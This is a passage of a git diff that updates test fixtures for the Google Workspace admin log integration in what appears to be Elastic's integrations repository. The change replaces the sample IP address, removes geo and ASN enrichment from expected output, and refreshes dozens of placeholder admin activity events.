+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES\",\"parameters\":[{\"name\":\"SERVICE_NAME\",\"value\":\"service\"},{\"name\":\"SITE_LOCATION\",\"value\":\"/path/in/url\"},{\"name\":\"WEB_ADDRESS\",\"value\":\"http://example.com/path/in/url\"}]}}",
 "provider": "admin",
 "action": "CHANGE_SITES_WEB_ADDRESS_MAPPING_UPDATES",
 "id": "1",
@@ -338,7 +266,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -362,35 +290,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:26.128868Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"VIEW_SITE_DETAILS\",\"parameters\":[{\"name\":\"SITE_NAME\",\"value\":\"site\"}]}}",
+ "ingested": "2021-12-09T13:38:56.332611900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SITES_SETTINGS\",\"name\":\"VIEW_SITE_DETAILS\",\"parameters\":[{\"name\":\"SITE_NAME\",\"value\":\"site\"}]}}",
 "provider": "admin",
 "action": "VIEW_SITE_DETAILS",
 "id": "1",
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log
index bed874fc9a4..7caea410de5 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-user.log
@@ -1,74 +1,74 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GENERATE_2SV_SCRATCH_CODES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_DEVICE_TOKENS","parameters":[{"name":"DEVICE_ID","value":"id"},{"name":"DEVICE_TYPE","value":"type"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_3LO_TOKEN","parameters":[{"name":"APP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GRANT_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_ADMIN_PRIVILEGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_ASP","parameters":[{"name":"ASP_ID","value":"id"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"TOGGLE_AUTOMATIC_CONTACT_SHARING","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD","parameters":[{"name":"BULK_UPLOAD_FAIL_USERS_NUMBER","value":"1"},{"name":"BULK_UPLOAD_TOTAL_USERS_NUMBER","value":"10"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"BULK_UPLOAD_NOTIFICATION_SENT","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CANCEL_USER_INVITE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DOMAIN_NAME","value":"example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_CUSTOM_FIELD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"USER_CUSTOM_FIELD","value":"custom"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_EXTERNAL_ID","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_GENDER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_IM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ENABLE_USER_IP_WHITELIST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_KEYWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LANGUAGE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_LOCATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ORGANIZATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_PHONE_NUMBER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_RELATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_USER_ADDRESS","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"},{"name":"EMAIL_MONITOR_LEVEL_CHAT","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL","value":"info"},{"name":"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL","value":"info"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_DATA_TRANSFER_REQUEST","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"DESTINATION_USER_EMAIL","value":"dest@example.com"},{"name":"APPLICATION_NAME","value":"a,b,c"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GRANT_DELEGATED_ADMIN_PRIVILEGES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_ACCOUNT_INFO_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_EMAIL_MONITOR","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"EMAIL_MONITOR_DEST_EMAIL","value":"dest@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DELETE_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"REQUEST_ID","value":"id"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_FIRST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"GMAIL_RESET_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"GMAIL_RESET_REASON","value":"reason"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_LAST_NAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_ADDED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"MAIL_ROUTING_DESTINATION_REMOVED","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ADD_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_NICKNAME","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"USER_NICKNAME","value":"nick"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CHANGE_PASSWORD_ON_NEXT_LOGIN","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"DOWNLOAD_PENDING_INVITES_LIST"}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_EMAIL","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REMOVE_RECOVERY_PHONE","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REQUEST_ACCOUNT_INFO","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REQUEST_MAILBOX_DUMP","parameters":[{"name":"USER_EMAIL","value":"user@example.com"},{"name":"BEGIN_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"EMAIL_EXPORT_INCLUDE_DELETED","value":"true"},{"name":"EMAIL_EXPORT_PACKAGE_CONTENT","value":"contents"},{"name":"SEARCH_QUERY_FOR_DUMP","value":"foo bar"},{"name":"END_DATE_TIME","value":"2002-10-02T16:00:00Z"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RESEND_USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"RESET_SIGNIN_COOKIES","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"SECURITY_KEY_REGISTERED_FOR_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"REVOKE_SECURITY_KEY","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"USER_INVITE","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"VIEW_TEMP_PASSWORD","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"TURN_OFF_2_STEP_VERIFICATION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNBLOCK_USER_SESSION","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UNENROLL_USER_FROM_TITANIUM","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"ARCHIVE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"UPDATE_BIRTHDATE","parameters":[{"name":"BIRTHDATE","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"USER_SETTINGS","name":"CREATE_USER","parameters":[{"name":"USER_EMAIL","value":"user@example.com"}]}}
